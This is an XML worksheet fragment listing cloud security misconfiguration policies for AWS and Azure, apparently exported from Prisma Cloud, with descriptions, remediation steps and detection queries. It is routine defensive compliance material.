        </is>
      </c>
      <c r="AD92" t="b">
        <v>1</v>
      </c>
      <c r="AE92" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF92" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>55b4de5f-2b59-4545-ac0c-f4ebad2e3add</t>
        </is>
      </c>
      <c r="AI92" t="inlineStr">
        <is>
          <t>1c513ad3-7db5-4fbf-abdd-39969f222f13</t>
        </is>
      </c>
      <c r="AJ92" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK92" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B93" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C93" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D93" t="inlineStr"/>
      <c r="E93" t="inlineStr"/>
      <c r="F93" t="inlineStr"/>
      <c r="G93" t="b">
        <v>1</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J93" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K93" t="inlineStr">
        <is>
          <t>AWS S3 bucket publicly readable</t>
        </is>
      </c>
      <c r="L93" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M93" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N93" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O93" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P93" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q93" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R93" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S93" t="inlineStr">
        <is>
          <t>Attack Path Rule,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T93" t="b">
        <v>0</v>
      </c>
      <c r="U93" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V93" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W93" t="inlineStr">
        <is>
          <t>This policy identifies the S3 buckets that are publicly readable by Get/Read/List bucket operations. These permissions permit anyone, malicious or not, to Get/Read/List bucket operations on your S3 bucket if they can guess the namespace. S3 service does not protect the namespace if ACLs and Bucket policy is not handled properly, with this configuration you may be at risk of compromise of critical data by leaving S3 public.
For more details:
https://docs.aws.amazon.com/AmazonS3/latest/user-guide/set-permissions.html
https://docs.aws.amazon.com/AmazonS3/latest/dev/about-object-ownership.html#ensure-object-ownership</t>
        </is>
      </c>
      <c r="X93" t="inlineStr">
        <is>
          <t>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GET/LIST objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific GET/LIST functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y93" t="inlineStr"/>
      <c r="Z93" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule =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and (acl.grantsAsList[?any(grantee equals AllUsers and permission is member of (ReadAcp,Read,FullControl))] exists or acl.grantsAsList[?any(grantee equals AuthenticatedUsers and permission is member of (ReadAcp,Read,FullControl))] exists))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and (policy.Statement[?any(Effect equals Allow and (Principal equals * or Principal.AWS equals *) and (Action contains s3:* or Action contains s3:Get or Action contains s3:List) and (Condition does not exist))] exists))) and websiteConfiguration does not exist</t>
        </is>
      </c>
      <c r="AA93" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB93" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC93" t="inlineStr">
        <is>
          <t>PC-AWS-S3-637</t>
        </is>
      </c>
      <c r="AD93" t="b">
        <v>1</v>
      </c>
      <c r="AE93" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF93" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>e0b4379d-6692-41ab-bd33-10cbac836b1e</t>
        </is>
      </c>
      <c r="AI93" t="inlineStr">
        <is>
          <t>70b5bb02-aafd-4c23-ac4b-4872b3aced30</t>
        </is>
      </c>
      <c r="AJ93" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK93" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B94" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C94" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D94" t="inlineStr"/>
      <c r="E94" t="inlineStr"/>
      <c r="F94" t="inlineStr"/>
      <c r="G94" t="b">
        <v>1</v>
      </c>
      <c r="H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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J94" t="inlineStr">
        <is>
          <t>aws-sagemaker</t>
        </is>
      </c>
      <c r="K94" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance is not placed in VPC</t>
        </is>
      </c>
      <c r="L94" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M94" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N94" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O94" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P94" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q94" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R94" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S94" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T94" t="b">
        <v>0</v>
      </c>
      <c r="U94" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V94" t="inlineStr">
        <is>
          <t>aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W94" t="inlineStr">
        <is>
          <t>This policy identifies SageMaker notebook instances that are not placed inside a VPC. It is recommended to place your SageMaker inside VPC so that VPC-only resources able to access your SageMaker data, which cannot be accessed outside a VPC network.
For more details:
https://docs.aws.amazon.com/sagemaker/latest/dg/process-vpc.html</t>
        </is>
      </c>
      <c r="X94" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance can be not placed in VPC once it is created. You need to create a new notebook instance placing it in VPC; migrate all required data from the reported notebook instance to the newly created notebook instance before you delete the reported notebook instance.
To create a New AWS SageMaker notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and then choose 'Create notebook instance'
4. On the Create notebook instance page, within the 'Network' section,
From the 'VPC – optional' dropdown list, select the VPC where you want to deploy a new SageMaker notebook instance.
5. Choose other parameters as per your requirement and click on the 'Create notebook instance' button
To delete reported notebook instance,
1. Log in to AWS console
2. Navigate to the AWS SageMaker dashboard
3. Choose Notebook instances and Choose the reported notebook instance
4. Click on the 'Actions' dropdown menu, select the 'Stop' option, and when instance stops, select the 'Delete' option.
5. Within Delete &lt;notebook-instance-name&gt; dialog box, click the Delete button to confirm the action. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-306
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-306</t>
        </is>
      </c>
      <c r="Y94" t="inlineStr"/>
      <c r="Z94" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sagemaker-notebook-instance' AND json.rule = notebookInstanceStatus equals InService and subnetId does not exist
{"category":"Networking","resourceTypes":["aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA94" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB94" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC94" t="inlineStr">
        <is>
          <t>PC-AWS-SGM-562-CKV_AWS_306</t>
        </is>
      </c>
      <c r="AD94" t="b">
        <v>1</v>
      </c>
      <c r="AE94" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF94" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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4" t="inlineStr">
        <is>
          <t>4af86954-7e52-46d6-bf4a-efa0c4ccee41</t>
        </is>
      </c>
      <c r="AI94" t="inlineStr">
        <is>
          <t>e776dc78-2f1a-4b19-b86f-79eeec8c90c0</t>
        </is>
      </c>
      <c r="AJ94" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK94" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B95" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C95" s="2" t="inlineStr">
        <is>
          <t>Secure development</t>
        </is>
      </c>
      <c r="D95" t="inlineStr"/>
      <c r="E95" t="inlineStr"/>
      <c r="F95" t="inlineStr"/>
      <c r="G95" t="b">
        <v>1</v>
      </c>
      <c r="H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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J95" t="inlineStr">
        <is>
          <t>aws-secretsmanager</t>
        </is>
      </c>
      <c r="K95" t="inlineStr">
        <is>
          <t>AWS Secret Manager Automatic Key Rotation is not enabled</t>
        </is>
      </c>
      <c r="L95" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M95" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N95" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O95" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P95" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q95" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R95" t="inlineStr">
        <is>
          <t>Secure development</t>
        </is>
      </c>
      <c r="S95" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure development</t>
        </is>
      </c>
      <c r="T95" t="b">
        <v>0</v>
      </c>
      <c r="U95" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V95" t="inlineStr">
        <is>
          <t>aws-secretsmanager-describe-secret</t>
        </is>
      </c>
      <c r="W95" t="inlineStr">
        <is>
          <t>This policy identifies AWS Secret Manager that are not enabled with key rotation. As a security best practice, it is important to rotate the keys periodically so that if the keys are compromised, the data in the underlying service is still secure with the new keys.
NOTE: This policy does not include secret manager which are managed by some of the AWS services that store AWS Secrets Manager secrets on your behalf. Refer: https://docs.aws.amazon.com/secretsmanager/latest/userguide/service-linked-secrets.html</t>
        </is>
      </c>
      <c r="X95" t="inlineStr">
        <is>
          <t>To enable Automatic Key Rotation for AWS Secret Manager follow the steps mentioned in below URL:
https://aws.amazon.com/blogs/security/how-to-configure-rotation-windows-for-secrets-stored-in-aws-secrets-manager/#:~:text=Use%20Case%203 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-57
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-57</t>
        </is>
      </c>
      <c r="Y95" t="inlineStr"/>
      <c r="Z95" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-secretsmanager-describe-secret' AND json.rule = rotationEnabled is false and owningService is not member of (appflow, databrew, datasync, directconnect, events, opsworks-cm, rds, sqlworkbench)
{"category":"General","resourceTypes":["aws_secretsmanager_secret"]}</t>
        </is>
      </c>
      <c r="AA95" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB95" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC95" t="inlineStr">
        <is>
          <t>PC-AWS-ASM-910-CKV2_AWS_57</t>
        </is>
      </c>
      <c r="AD95" t="b">
        <v>1</v>
      </c>
      <c r="AE95" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF95" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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5" t="inlineStr">
        <is>
          <t>fd6a6fc7-8c83-4b3c-b239-7fbdd42abc42</t>
        </is>
      </c>
      <c r="AI95" t="inlineStr">
        <is>
          <t>ad71cafd-f8da-4f2e-9b4b-76c1792dcdc7</t>
        </is>
      </c>
      <c r="AJ95" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK95" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B96" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C96" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D96" t="inlineStr"/>
      <c r="E96" t="inlineStr"/>
      <c r="F96" t="inlineStr"/>
      <c r="G96" t="b">
        <v>0</v>
      </c>
      <c r="H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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J96" t="inlineStr">
        <is>
          <t>aws-sqs</t>
        </is>
      </c>
      <c r="K96" t="inlineStr">
        <is>
          <t>AWS SQS queue encryption using default KMS key instead of CMK</t>
        </is>
      </c>
      <c r="L96" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M96" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N96" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O96" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P96" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q96" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R96" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S96" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T96" t="b">
        <v>0</v>
      </c>
      <c r="U96" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V96" t="inlineStr">
        <is>
          <t>aws-sqs-get-queue-attributes</t>
        </is>
      </c>
      <c r="W96" t="inlineStr">
        <is>
          <t>This policy identifies SQS queues which are encrypted with default KMS keys and not with Customer Master Keys(CMKs). It is a best practice to use customer managed Master Keys to encrypt your SQS queue messages. It gives you full control over the encrypted messages data.</t>
        </is>
      </c>
      <c r="X96" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Select the region, from the region drop-down, in which the alert is generated
3. Navigate to Simple Queue Service (SQS) dashboard
4. Choose the reported Simple Queue Service (SQS)
5. Click on 'Queue Actions' and Choose 'Configure Queue' from the dropdown 
6. On 'Configure' popup, Under 'Server-Side Encryption (SSE) Settings' section; Choose an 'AWS KMS Customer Master Key (CMK)' from the drop-down list or copy existing key ARN instead of (Default) alias/aws/sqs key.
7. Click on 'Save Changes'</t>
        </is>
      </c>
      <c r="Y96" t="inlineStr"/>
      <c r="Z96" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sqs-get-queue-attributes' AND json.rule = 'attributes.KmsMasterKeyId exists and attributes.KmsMasterKeyId contains alias/aws/sqs'</t>
        </is>
      </c>
      <c r="AA96" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB96" t="inlineStr">
        <is>
          <t>2024-11-13 09:34:41</t>
        </is>
      </c>
      <c r="AC96" t="inlineStr">
        <is>
          <t>PC-AWS-SQS-348</t>
        </is>
      </c>
      <c r="AD96" t="b">
        <v>1</v>
      </c>
      <c r="AE96" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF96" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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6" t="inlineStr">
        <is>
          <t>45f307ff-288c-4f87-92ec-bee6d0318b27</t>
        </is>
      </c>
      <c r="AI96" t="inlineStr">
        <is>
          <t>0a626f64-d911-4366-b7dc-629a6557d7b5</t>
        </is>
      </c>
      <c r="AJ96" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK96" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B97" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C97" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D97" t="inlineStr"/>
      <c r="E97" t="inlineStr"/>
      <c r="F97" t="inlineStr"/>
      <c r="G97" t="b">
        <v>0</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J97" t="inlineStr">
        <is>
          <t>aws-waf</t>
        </is>
      </c>
      <c r="K97" t="inlineStr">
        <is>
          <t>AWS Web Application Firewall (AWS WAF) Classic logging is disabled</t>
        </is>
      </c>
      <c r="L97" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M97" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N97" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O97" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P97" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q97" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R97" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S97" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T97" t="b">
        <v>0</v>
      </c>
      <c r="U97" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V97" t="inlineStr">
        <is>
          <t>aws-waf-classic-web-acl-resource</t>
        </is>
      </c>
      <c r="W97" t="inlineStr">
        <is>
          <t>This policy identifies Classic Web Application Firewalls (AWS WAFs) for which logging is disabled. Enabling WAF logging, logs all web requests inspected by the service which can be used for debugging and additional forensics. The logs will help to understand why certain rules are triggered and why certain web requests are blocked. You can also integrate the logs with any SIEM and log analysis tools for further analysis. It is recommended to enable logging on your Classic Web Application Firewalls (WAFs).
For details:
https://docs.aws.amazon.com/waf/latest/developerguide/classic-logging.html
NOTE: Global (CloudFront) WAF resources are out of scope for this policy.</t>
        </is>
      </c>
      <c r="X97" t="inlineStr">
        <is>
          <t>To enable logging on your reported WAFs, follow below mentioned URL:
https://docs.aws.amazon.com/waf/latest/developerguide/classic-logging.html#logging-management
NOTE: No additional cost to enable logging on AWS WAF (minus Kinesis Firehose and any storage cost).
For Kinesis Firehose or any storage additional charges refer https://aws.amazon.com/cloudwatch/pricing/</t>
        </is>
      </c>
      <c r="Y97" t="inlineStr"/>
      <c r="Z97" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-waf-classic-web-acl-resource' AND json.rule = '(resources.applicationLoadBalancer[*] exists or resources.apiGateway[*] exists or resources.other[*] exists) and loggingConfiguration.resourceArn does not exist'</t>
        </is>
      </c>
      <c r="AA97" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB97" t="inlineStr">
        <is>
          <t>2024-11-13 09:34:43</t>
        </is>
      </c>
      <c r="AC97" t="inlineStr">
        <is>
          <t>PC-AWS-WAF-748</t>
        </is>
      </c>
      <c r="AD97" t="b">
        <v>1</v>
      </c>
      <c r="AE97" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF97" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>4aef2d8d-d2ca-42e8-a0c9-930827a7cadf</t>
        </is>
      </c>
      <c r="AI97" t="inlineStr">
        <is>
          <t>9e69d4bf-cecb-45bf-a7a7-bb1d4d70e3a4</t>
        </is>
      </c>
      <c r="AJ97" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK97" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B98" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C98" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D98" t="inlineStr"/>
      <c r="E98" t="inlineStr"/>
      <c r="F98" t="inlineStr"/>
      <c r="G98" t="b">
        <v>0</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J98" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="K98" t="inlineStr">
        <is>
          <t>Azure VM disk configured with public network access</t>
        </is>
      </c>
      <c r="L98" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M98" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N98" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O98" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P98" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q98" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R98" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S98" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Awesome_Standard,AW_AZURE_Data protection</t>
        </is>
      </c>
      <c r="T98" t="b">
        <v>1</v>
      </c>
      <c r="U98" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V98" t="inlineStr">
        <is>
          <t>azure-disk-list</t>
        </is>
      </c>
      <c r="W98" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine disks that are configured with public network access.
Allowing public access to Azure Virtual Machine disk resources increases the risk of unauthorized access and potential security breaches. Public network access exposes sensitive data to external threats, which attackers could exploit to compromise VM disks. Disabling public access and using Azure Private Link reduces exposure, ensuring only trusted networks have access and enhancing the security of your Azure environment by minimizing the risk of data leaks and breaches.
As a security best practice, it is recommended to disable public network access for Azure Virtual Machine disks.</t>
        </is>
      </c>
      <c r="X98" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Disks'
3. Click on the reported disk
4. Under 'Settings', go to 'Networking'
5. Ensure that Network access is NOT set to 'Enable public access from all networks'
6. Click 'Save'</t>
        </is>
      </c>
      <c r="Y98" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Compute/disks/write' permission. Successful execution will disable public network access and sets the network access policy to DenyAll for the specified disk,
blocking external access. \nNote: As a security best practice,
we are disabling public and private access to the disk. However,
you can choose between the following options based on your security requirements:\n- Disable public access and enable private access\n- Disable public and private access",
'impact': 'Disable public network access for Azure Virtual Machine disk',
'cliScriptTemplate': 'az disk update --name $resourceName --resource-group $resourceGroup --public-network-access Disabled --network-access-policy DenyAll'</t>
        </is>
      </c>
      <c r="Z98" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-disk-list' AND json.rule = publicNetworkAccess equal ignore case Enabled and networkAccessPolicy equal ignore case AllowAll and managedBy contains virtualMachines</t>
        </is>
      </c>
      <c r="AA98" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB98" t="inlineStr">
        <is>
          <t>2024-11-13 16:08:56</t>
        </is>
      </c>
      <c r="AC98" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-1316</t>
        </is>
      </c>
      <c r="AD98" t="b">
        <v>1</v>
      </c>
      <c r="AE98" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF98" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>fa6e9e09-d02e-418a-a573-baed692391ed</t>
        </is>
      </c>
      <c r="AI98" t="inlineStr">
        <is>
          <t>6a3ba52c-1a0e-4359-aba5-e417ca280270</t>
        </is>
      </c>
      <c r="AJ98" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK98" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B99" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C99" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D99" t="inlineStr"/>
      <c r="E99" t="inlineStr"/>
      <c r="F99" t="inlineStr"/>
      <c r="G99" t="b">
        <v>0</v>
      </c>
      <c r="H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99" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J99" t="inlineStr">
        <is>
          <t>azure-log-analytics</t>
        </is>
      </c>
      <c r="K99" t="inlineStr">
        <is>
          <t>Azure Log Analytics workspace configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L99" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M99" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N99" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O99" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P99" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q99" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R99" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S99" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AZURE_Logging</t>
        </is>
      </c>
      <c r="T99" t="b">
        <v>0</v>
      </c>
      <c r="U99" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V99" t="inlineStr">
        <is>
          <t>azure-log-analytics-workspace</t>
        </is>
      </c>
      <c r="W99" t="inlineStr">
        <is>
          <t>This policy identifies Log Analytics workspaces configured with overly permissive network access.
Virtual networks access configuration in Log Analytics workspace allows you to restrict data ingestion and queries coming from the public networks.
It is recommended to configure the Log Analytics workspace with virtual networks access configuration set to restrict, so that the Log Analytics workspace is accessible only to restricted Azure Monitor Private Link Scopes.</t>
        </is>
      </c>
      <c r="X99" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Log Analytics workspaces dashboard 
3. Click on the reported Log Analytics workspace
4. Under the 'Settings' menu, click on 'Network Isolation'
5. Create a Azure Monitor Private Link Scope if it is not already created by refering:
https://docs.microsoft.com/en-us/azure/azure-monitor/logs/private-link-configure#create-an-azure-monitor-private-link-scope
6. After creating, Under 'Virtual networks access configuration', 
Set 'Accept data ingestion from public networks not connected through a Private Link Scope' to 'No' and 
Set 'Accept queries from public networks not connected through a Private Link Scope' to 'No'
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y99" t="inlineStr"/>
      <c r="Z99" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-log-analytics-workspace' AND json.rule = properties.provisioningState equals Succeeded and (properties.publicNetworkAccessForQuery equals Enabled or properties.publicNetworkAccessForIngestion equals Enabled)</t>
        </is>
      </c>
      <c r="AA99" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB99" t="inlineStr">
        <is>
          <t>2024-11-13 09:34:47</t>
        </is>
      </c>
      <c r="AC99" t="inlineStr">
        <is>
          <t>PC-AZR-ALA-857</t>
        </is>
      </c>
      <c r="AD99" t="b">
        <v>1</v>
      </c>
      <c r="AE99" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF99" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
